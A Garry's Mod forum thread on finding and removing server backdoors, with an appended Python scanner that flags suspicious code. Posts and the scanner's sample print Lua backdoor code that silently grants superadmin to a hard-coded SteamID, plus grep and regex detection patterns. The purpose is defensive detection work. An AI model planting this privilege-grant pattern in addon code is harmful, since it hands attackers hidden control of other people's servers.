Garry's Mod
How to remove BACKDOOR ?
Submitted by Zebeub2000, 29-04-2022, 08:25 PM, Thread ID: 241506
Thread Closed

29-04-2022, 08:25 PM #1
I have a server and I have a backdoor, so how do I remove it :(

RE: How to remove BACKDOOR ? 06-05-2022, 04:29 AM #2
Do you know what file it is located in?

Source Of Quote: https://mtxserv.com/gmod-server/doc/how-...or-on-gmod

To identify a backdoor, you have to look at all SteamIDs. For example:

    AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:58 Drakehawke (STEAM_0:0:22342869) (64 commits on old SVN)

That is not a backdoor. It's just the name of a legit player. A backdoor looks like this:

    2 - AUTHENT (Presence of Steam ID) addons/nestorro/lua/autorun/nestorro_launch.lua:101 if ( ply:SteamID() == "STEAM_0:1:64045285") then

If you have

    ply:SteamID() == "STEAM_0:100000000") then

it's possibly a backdoor. You always have to check something like that! A backdoor can be something like:

    if ( ply:SteamID() == "STEAM_0:1:00000000") then
        RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin")
    else

How to remove a backdoor?

To remove the entire backdoor, remove the code (which can look like this):

    concommand.Add( "Nestor", function(ply)
        if ( ply:SteamID() == "STEAM_0:0:82261024") then
            RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin")
        else
            ply:ChatPrint("Bye " .. ply:Name() .. ".")
        end
    end)

RE: How to remove BACKDOOR ? 07-05-2022, 08:20 AM #3
To remove the entire backdoor, remove the code (which can look like this): Here comes the bus.

RE: How to remove BACKDOOR ? 22-05-2022, 09:46 AM #4
This post was last modified: 22-05-2022, 10:29 AM by Globungus

Good things to look for are SteamIDs, as mentioned. My preferred method is to search for any 17-digit numbers (SteamID 64) and STEAM_. This can be accomplished with:

Code:
    # grep -E uses POSIX ERE, so digits are written as [0-9]
    find ./ -exec grep -E '[0-9]{17}|STEAM_' {} \; -print 2>/dev/null

For bytecode and other obfuscated code, try to search for RunString with:

Code:
    find ./ -exec grep 'RunString' {} \; -print 2>/dev/null

RE: How to remove BACKDOOR ? 05-06-2022, 04:51 PM #5
To remove the entire backdoor, remove the code (which can look like this): Here comes the bus.
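
Added example, not part of the thread and not any poster's code: a Python scanner that extends the searches from post #4 by labelling each hit, so an author credit in a comment is told apart from a hard-coded ID check followed by a rank change like the one quoted in post #2. The function names, the labels, the three-line look-ahead and the sample IDs are assumptions made for this example.

```python
import re
from pathlib import Path

STEAM_ID = re.compile(r'STEAM_\d:\d:\d+|(?<!\d)\d{17}(?!\d)')  # text ID or 17-digit ID
ID_CHECK = re.compile(r'SteamID(64)?\s*\(\s*\)\s*[=~]=')  # ply:SteamID() == ...
GRANT = re.compile(r'adduserid|superadmin')  # rank change seen in the quoted backdoor
DYNAMIC = re.compile(r'\bRunString\s*\(')

def strip_comment(line):
    """Drop a Lua '--' comment (naive: does not handle '--' inside strings)."""
    return line.split('--', 1)[0]

def scan_lua(text):
    """Return (line_no, label, source_line) findings for one Lua source."""
    lines, findings = text.splitlines(), []
    for i, raw in enumerate(lines):
        code = strip_comment(raw)
        if DYNAMIC.search(code):
            findings.append((i + 1, 'dynamic-code', raw.strip()))
        if not STEAM_ID.search(raw):
            continue
        if not STEAM_ID.search(code):
            label = 'id-in-comment'  # e.g. an author credit, usually benign
        elif ID_CHECK.search(code):
            # Assumption: a grant sits on the check line or the next 3 lines.
            window = ' '.join(strip_comment(ln) for ln in lines[i:i + 4])
            label = 'id-check-grants-privilege' if GRANT.search(window) else 'id-check'
        else:
            label = 'id-literal'
        findings.append((i + 1, label, raw.strip()))
    return findings

def scan_tree(root):
    """Scan every .lua file under root; returns {relative_path: findings}."""
    report = {}
    for path in sorted(Path(root).rglob('*.lua')):
        found = scan_lua(path.read_text(encoding='utf-8', errors='replace'))
        if found:
            report[str(path.relative_to(root))] = found
    return report

# Constructed sample input (IDs are made up), shaped like the thread's snippets.
SAMPLE = '''-- Credits: ExampleDev (STEAM_0:0:11111111)
concommand.Add("example_cmd", function(ply)
  if ( ply:SteamID() == "STEAM_0:1:00000000") then
    RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin")
  end
end)
RunString(payload)
'''
```

Run `scan_tree('.')` from the directory that holds `addons/` and `gamemodes/`. A label is only a triage hint, so each finding still needs a manual read of the file before anything is deleted.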